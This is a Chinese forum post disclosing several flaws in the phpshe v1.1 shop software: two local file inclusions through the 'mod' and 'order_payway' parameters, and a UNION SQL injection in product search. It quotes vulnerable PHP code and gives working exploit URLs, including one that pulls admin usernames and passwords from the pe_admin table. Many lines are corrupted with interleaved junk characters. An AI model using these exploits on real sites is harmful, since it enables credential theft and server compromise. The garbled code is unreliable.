phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin · 发表于 2013-4-19 19:01:54

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

//首页文件
pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php"); //$mod可控造成“鸡肋”包含漏洞
pe_result();
?>
//common 文件第15行开始
url路由配置
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

9 I$ S) A. D- \# [1 j$ h s
( Z \) B5 b3 m h2 p- C3 Z 0×02 搜索注入4 }. [# I+ d8 o6 M( p! ~

7 w0 [$ P; x9 Y. x9 n) }+ q" q<code id="code2">

//product.php文件- p! s+ E: Q% O- ~+ d8 O
case 'list':0 ?. C) l. Z4 s" I
$category_id = intval($id);% a8 H; q1 n; ~$ `, O9 [
$info = $db->pe_select('category', array('category_id'=>$category_id));
9 n4 J- m( T, R9 Q# P0 J//搜索/ _' \1 P; V- f6 I' p9 f
$sqlwhere = " and `product_state` = 1";
+ |% c, k" w+ j- M% f8 {pe_lead('hook/category.hook.php');: e3 O6 {! O/ y8 _
if ($category_id) {0 x" Q# x/ }- E" W+ A* J% z; L
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
8 u2 q! ?- g6 ?# r}
; h0 |* f5 l. ^1 o& C4 q* J" O& k$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
5 C  F2 I( |3 m  i! l- |if ($_g_orderby) {! ~/ I& _* ]2 \/ Y5 ]9 d$ k2 L2 Z  R
$orderby = explode('_', $_g_orderby);( }& @" C5 p" W- M
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";+ @. }- ^$ T/ |0 D5 j
}, i9 f' j' |; i0 r
else {
  P$ k) u5 R. C% h- h9 r$sqlwhere .= " order by `product_id` desc";: B) F0 `& n0 u! k, F( i7 u- n
}0 j  B) Y& [4 `* Q4 Z
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));9 l5 c' p5 m  j8 Z. u  `
//热卖排行, ], F. \- G! w9 {
$product_hotlist = product_hotlist();
: G+ R, Q0 |& ~" c//当前路径" ?% E: g& C* r) a8 m  T8 H
$nowpath = category_path($category_id);
$ ~! v. E6 F+ ~5 j4 R  _$seo = pe_seo($info['category_name']);" q5 ~% a# W9 Y4 D% F
include(pe_tpl('product_list.html'));
4 l0 A6 b7 E, k0 k- W! T4 |//跟进selectall函数库# M8 b- D0 D6 V
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array()); W" c" u; T* D6 o
{
7 s, B! q+ i0 m5 g. e//处理条件语句7 {1 f- O+ v* {9 O- y0 C" `1 X* b1 a
$sqlwhere = $this->_dowhere($where);
* v( F/ d3 Y6 u, [& sreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
# D! ^; ]) y' F9 E9 d}
$ _" ~% L0 y/ Y$ D% V//exp
' Q0 ]1 k6 g: cproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
6 l" D5 {; _% l; U

</code>
5 J% Y% m% c) w" M8 W: b4 R" U. d3 r
& i' f C' @/ ^) \* W- V. \3 u0×03 包含漏洞2
, b% f3 R" g, s9 n- c: R" Y
~ U' i4 S9 h' V<code id="code3">

//order.php

case 'pay':

8 C3 D! R) k( ?' A$ a& _$order_id = pe_dbhold($_g_id);

7 T/ w! R" J& [5 p4 u$ R; V$ I4 B$ X
$cache_payway = cache::get('payway');

- ?4 q5 ~) R/ g9 ~( }& v
foreach($cache_payway as $k => $v) {

1 N' q0 |% ~% a% N* W U$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

- B$ X+ Z! G A* `& ]
if ($k == 'bank') {

5 J! A# v( S$ V3 V* C& n
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

1 |4 h6 D3 D$ \: ~9 }4 W}

( _4 A: d; Z0 s% o3 i. S
}

& x8 n2 @* s; r
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

( w0 w. j+ Y/ j' y; l' Y# \# C4 F!$order['order_id'] && pe_error('订单号错误...');

$ F6 D- L* o' ?( X. _% d2 b
if (isset($_p_pesubmit)) {

) R0 L! E/ b( B" k
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

1 U l. m. b2 Y: }! K r! C) k
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

" r3 r1 x( N( P9 x4 u5 b3 t
foreach ($info_list as $v) {

4 q% q% n1 I2 V" s& _- |
$order['order_name'] .= "{$v['product_name']};";
* R; D# o; s6 B' {; _& k) X0 U

D# W% f$ O) x, S}

, O# t8 j9 u% becho '正在为您连接支付网站，请稍后...';

7 ]/ a, |7 c) ^9 w( t5 W1 j
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

3 a; _# e+ h! b* Z/ B. m}//当一切准备好的时候就可以进行"鸡肋包含了"

) M4 g M" M2 G
else {

" _" P# l+ f# j! w
pe_error('支付错误...');

; U9 p5 h: f1 ?1 m8 g A {; T0 _/ S: ?
}

! }+ U7 {: D+ A3 L9 X8 Y( J0 K
}

4 }: ^+ }1 ?' Q) D$ z* G. o H
$seo = pe_seo('选择支付方式');

& S/ I: d. h/ h7 w* _1 D) f/ s# Z7 ninclude(pe_tpl('order_pay.html'));

$ f$ N. T' v, z+ s" Obreak;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>! x3 Y. @' r u- l0 L8 h

		自动登录	找回密码
密码			立即注册